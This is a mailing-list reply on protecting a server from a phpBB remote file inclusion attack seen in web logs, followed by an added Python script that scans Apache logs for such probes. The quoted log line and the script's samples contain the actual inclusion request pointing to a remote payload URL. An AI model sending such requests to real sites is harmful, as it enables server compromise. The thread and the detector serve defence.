On Wednesday 25 April 2007 15:06, James D. Parra wrote:
> On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
> > Hello,
> >
> > I found these errors in our web logs and it appears that either
> > there is a PHP attack on the apache site or perhaps a kit on the
> > server?
> >
> > Errors below (profanity not mine);
> >
> > 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
> > ...
>
> It doesn't appear that the system was compromised. How can I protect
> the system from such an attack?

This one is so obvious, one would expect the authors of phpBB have long since ceased their use of such readily exploitable coding practices, so if you have an up-to-date phpBB (or no phpBB at all), then, subject to confirmation of the assumption that this has indeed been fixed, you're safe.

Sadly, a bit of 'Net searching suggests that this is in fact a recently appearing exploit (<http://isc.sans.org/diary.html?storyid=2483&dshield=120c71b2ff75fa5e909a740342187c87>), so it's probably not a good idea to expect it to have been blocked yet.

If you don't have any PHP applications accessible via your Web server, then these attacks will be nothing more than a nuisance. If you don't use PHP (directly or indirectly), then you could just remove it and take Murphy's way out (only possible exploits can ever actually occur).

> Best regards,
>
> ~James

Randall Schulz
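
Added example, not part of the original thread or written by its participants: a Python check that scans Apache combined-format access log lines for requests like the one quoted above, where a query parameter carries a remote URL, and records whether the server answered 404 or actually served the script. The function name, the result field names and every sample line after the first are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# First line is the entry quoted in the thread; the others are constructed samples.
SAMPLE_LOG = [
    '69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"',
    '192.0.2.10 - - [02/Apr/2007:09:35:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Apr/2007:09:36:12 -0700] "GET /app/view.php?inc=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 312 "-" "ExampleScanner"',
]


def find_rfi_probes(lines):
    """Return one dict per request whose query string has a remote URL as a value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                status = int(m["status"])
                hits.append({
                    "client": m["host"],
                    "path": parts.path,
                    "param": name,
                    "remote": value,
                    "status": status,
                    # 2xx: the script exists and answered, so review how it
                    # uses this parameter; 404 means the probe found nothing
                    "served": 200 <= status < 300,
                    "agent": m["agent"],
                })
                break  # one hit per request is enough
    return hits


if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["path"], hit["param"], hit["remote"])
```

Legitimate parameters that hold URLs (redirect targets, for instance) will also match, so treat hits with `served` set as a list of scripts to review rather than as proof of compromise.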
